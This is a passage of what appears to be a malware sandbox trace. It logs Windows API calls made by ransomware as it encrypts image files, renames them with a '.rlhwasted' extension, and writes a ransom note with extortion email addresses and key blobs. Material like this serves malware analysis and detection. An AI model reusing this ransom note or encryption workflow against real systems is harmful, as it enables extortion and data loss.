KEY:\r\n[begin_key]ajvnZfwt4l4DBIJ9mHpKaaVHwa0qNlC4waTkDPej0p2SJYswHBaM6YsL5/nGvoY4\r\nOLcn3D+cEQsz28ND4BPrG+m5pLQY861ZadBTrr4cnl/M8NlrPBaQAEv7wrP64gAM\r\n57LjPYCUwBSypgFJjWeThkiTTQFIGdPnDWdMA1AF7XtL85U9CtxZl4z5y2MvjG/4\r\nLOt7PgvhtMlW12VI6xzirXXEpmMrtniQORRBjH1G0FMZ/ks5L1v+82k2oIy4Ak4E\r\nHe1PB7V3/U7JwErUJ92rDWAv1fwAU3KXFeXTMNs+FThAsIxnbxoGTiBglONl9FyK\r\nVxo+45mTmdvLwfBi1oo+7ahyYvtc+JEpgiIb37l7pby4zOmt0Z5IYRx8LMsdkyuf\r\n5pOW2L2/StWs8ErAq/WWtVmzWkanFov9LEDVEY5U4plF1m7+61VGUWZIgDeIyQfr\r\nA6hSf8WYd1+aH5Z1pOqGfS8i3MsAkCmd51NAZeJ1BW/yVePcOe3w2O/ChuTGIoi7\r\nGZOv5TJCkt/47NbFr4O+F6jQnZAymfuxjyspF2C08cZ/pRAZnE3WtOWhAlGctffs\r\nDWC4uz9RvwCxMaUiQ/h5er10EK7d/PiVRGdo4MgYCUEHLO2Z06pbIF2o9pzQZXze\r\n/nO384JvAhCgZ9VM9WVs4zQ8XZ+xZQTUnhIZ6TiOHI+=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.164] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.164] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.165] SetEndOfFile (hFile=0x104) returned 1 [0196.168] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.168] CloseHandle (hObject=0x104) returned 1 [0196.170] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.171] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e87f0 | out: hHeap=0x6b0000) returned 1 [0196.171] _aulldvrm () returned 0x0 [0196.171] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.172] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.172] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\z81BUM1rrUK-TF.png") returned 76 [0196.172] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6e7f18 [0196.172] lstrcpyW (in: lpString1=0x6e7fb0, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.172] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.172] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.173] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.173] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\z81BUM1rrUK-TF.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\z81bum1rruk-tf.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.180] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.181] SetEndOfFile (hFile=0x104) returned 1 [0196.181] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.181] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.181] lstrcpyW (in: lpString1=0x6e7fb0, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\z81BUM1rrUK-TF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\z81bum1rruk-tf.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\z81BUM1rrUK-TF.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\z81bum1rruk-tf.png.rlhwasted")) returned 1 [0196.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\z81BUM1rrUK-TF.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\avdsie15bdl1nh\\z81bum1rruk-tf.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0196.183] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.183] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x11c8d [0196.183] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c8d) returned 0xb00000 [0196.183] CloseHandle (hObject=0x10c) returned 1 [0196.188] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.189] CloseHandle (hObject=0x128) returned 1 [0196.189] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.189] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.190] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.190] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.190] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.191] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.191] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.201] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.202] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JsZcD6T5YpHqTbL1vRPwTNBU02lqX9UQK0LHOGFKaaMuqxh34/eJooyBQXrMKFnM\r\nV/oxPDx9D14L67VyaDl6TYBrqGHeQahJwVjXNChmPBNco9kjzjrX1+IQAE1CKYvI\r\nLq9DglTuqZ9YKGPRhhESTVw1H5HIFWhkEWm86CZa9OTu6KD5pzKLhO4cC96POh9b\r\nIKKAvzsS5VDbYDVKG402MFdORAIId+yFHpya2lScaPd07VNJCWp6PKIEjny0uW9l\r\nLFJEj+a/ElMIzMl3jSm/MZTAdDd6j3oQ2T0K5H5p0ex0pyW7eXKEFPQ5phMfJaXq\r\nTKCT+9yq9f7Y6hrKvePb/kD+m1OS+kMNOKBuAhCgfELBhIo+wPuk7ITX8dhGQLH/\r\ntjzAkKufBVrsur8EfUga46HY4N+UDZqrX6IMCIJYyqLGTECSFNpAS3+asm7ol+tR\r\nPpoDzSTCLaZK7a9lNm6o9LxX1QitsqxLRcgKTYhwMDiGFEmPpPF5nsScAuVdA6zp\r\neBD8QNTSSXOmKiHMtaSstjq22V/x6nfs6dLwmVMjrXgm8O/UjyZEQUQ9zusoizgk\r\nxqc6lyehMtPBIWaJfb0KRUBkniYKcshq3Ngzwh0v0vWqO6a8AMswioTR9o2LtfJ4\r\nwEkQ8N2SSaGrqVZhTngs9wJxnztFsa6xm46bDPZRCw5=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.202] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.202] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.202] SetEndOfFile (hFile=0x104) returned 1 [0196.204] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.205] CloseHandle (hObject=0x104) returned 1 [0196.206] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.207] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fea10 | out: hHeap=0x6b0000) returned 1 [0196.207] _aulldvrm () returned 0x0 [0196.207] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.208] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.208] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BqvISbJs1.jpg") returned 56 [0196.208] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27a) returned 0x6e7f18 [0196.208] lstrcpyW (in: lpString1=0x6e7f88, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.208] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.208] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.209] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.209] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BqvISbJs1.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqvisbjs1.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.210] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.211] SetEndOfFile (hFile=0x104) returned 1 [0196.211] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.211] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.211] lstrcpyW (in: lpString1=0x6e7f88, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BqvISbJs1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqvisbjs1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BqvISbJs1.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqvisbjs1.jpg.rlhwasted")) returned 1 [0196.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BqvISbJs1.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqvisbjs1.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.213] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0196.213] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x12435 [0196.213] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12435) returned 0xb00000 [0196.213] CloseHandle (hObject=0x128) returned 1 [0196.218] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.218] CloseHandle (hObject=0x10c) returned 1 [0196.218] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.218] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.219] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.219] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.219] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.220] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.220] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.283] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.283] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.283] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.284] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XaLyYJuWCXrDReSmPxhS0S7kv/GGjS50J2STzMtooBeiXfUD+VUgWD200fI1nKR/\r\nZ7akZS4ONlh4HpVcL2arABF73zPgbCK8bXxEOrkFAT+Q4BHWiVYByBH38MMRJ3rP\r\nlndQdFbIHHJQaLN7do/2gI45EVfKWSbsuSPHU2XJbLgPkV8cySrpNapbbfRJPBbC\r\nKfV9faR1NNwbqmSKO5O6Rbhe6KS5cEoOw7X36auQq+eS/pwNRNinb0w6l2VPtPDs\r\nr53U56lE6qN0LEi4DRp8uz4357OWfpZMchXKH+/NDpLBt/moqvFuxVGtr81z2b0q\r\ntPyw9ru4p0Vaz9406OsX6WNE9W+NRlH0OmXn1ZY1ylI3qMDc+Lg6Tu7GkJBFaB+k\r\nWAdF6t8E/Se8TUXmHguXUYNMPVlb+nGs2tZF7f3HOvpbBaHdRlSMFUvhQjiz28rf\r\nyb4Q3eGWY/hNJ/8vf2zmKcuDUbpFEhJolI57yFLZBa8IS5BuFhU63Db7NMTb8Q+s\r\neHoPfRgvdldNsATdYcyepysKQN90z9zX6a9vA/EOU+Ts1aavcqtdydEAT/kn5vlE\r\nfjxU8oXDj6kvaRte11aa8r5EbUWpzfu6FcGUkAcACVQQnthH1b7LeWjNzMH4IUJB\r\n6kGDNVInNtA9PLxbQ3asnFWSq8tRUujK6P5GN0delWh=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.284] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.284] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.285] SetEndOfFile (hFile=0x104) returned 1 [0196.288] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.288] CloseHandle (hObject=0x104) returned 1 [0196.290] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.290] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706110 | out: hHeap=0x6b0000) returned 1 [0196.290] _aulldvrm () returned 0x0 [0196.290] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0196.291] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.291] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.291] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\3q6M.bmp") returned 66 [0196.291] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6d4580 [0196.291] lstrcpyW (in: lpString1=0x6d4604, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.291] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.291] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0196.292] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.292] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\3q6M.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\3q6m.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.293] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.295] SetEndOfFile (hFile=0x104) returned 1 [0196.295] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.295] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.295] lstrcpyW (in: lpString1=0x6d4604, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\3q6M.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\3q6m.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\3q6M.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\3q6m.bmp.rlhwasted")) returned 1 [0196.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\3q6M.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\3q6m.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0196.297] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0196.297] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x12c4b [0196.297] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c4b) returned 0xb00000 [0196.297] CloseHandle (hObject=0x10c) returned 1 [0196.302] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.303] CloseHandle (hObject=0x12c) returned 1 [0196.303] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.303] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0196.304] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.304] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.304] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0196.305] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.305] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.315] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.315] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.315] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.315] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NaEQwZahQR0sMZu7uBo12UaNmeNipkPhERORv1YvlzZSfHnJDblBTG1Dsh3FsV79\r\nIGCTRrtsoKdpskelj/ycnD2LUf8KJ9NlOrUA2Q4+A3UZgVJgbHsDxfxa0DLDOzrq\r\nbES0tgJQkLG8tRiP0DYQYGjD8fD4gbVFhrrHKYwEzBk4L3OekUfWj1+NqAQt+13k\r\nujFIFPf1UpPTAzsbhqMDomrnmDyWDb5LDOQsRwQp8mTUKtH9V9kEsUMpRFed+6dA\r\n0IiJQICHGVYv/ZcL3Of2MksXgE4qYgbZxU0Is5Wug2MqcR/tur1Muqp4m/zDRRMt\r\nk89aF3VQHtvHf5YxyjioVpgg+A/+3yelWxOLcSUZwpo3R5x6808bSV3HgkCcv6W6\r\nOtGHDdaE2xSpBXuvhAn49eprSAWqZdbnbXzAMfqHwUtn1bUyJ8u9v/KV7Bidfm/g\r\nMQjZjVw38LgBCFuEEggEHK6gYvhfONZ5lXCWGaXqRimojxm4bOMz+B89wxnw6GCw\r\nE82melfCeeAhUhF47jW6nZGyatM4LaX2GeBFPPTMH6nmyFxv8UhblZDVV4zP83YL\r\nAHXYkmyiej9QlOaBSWOOwhAgrn544djBx0vcD3h691za/aJ5he2Q6lQFS4dUnglk\r\nF5DvVx703mUBx+piSjsIryvRjba/F/YRNavS6Qw4O7A=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.315] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.315] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.316] SetEndOfFile (hFile=0x104) returned 1 [0196.319] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 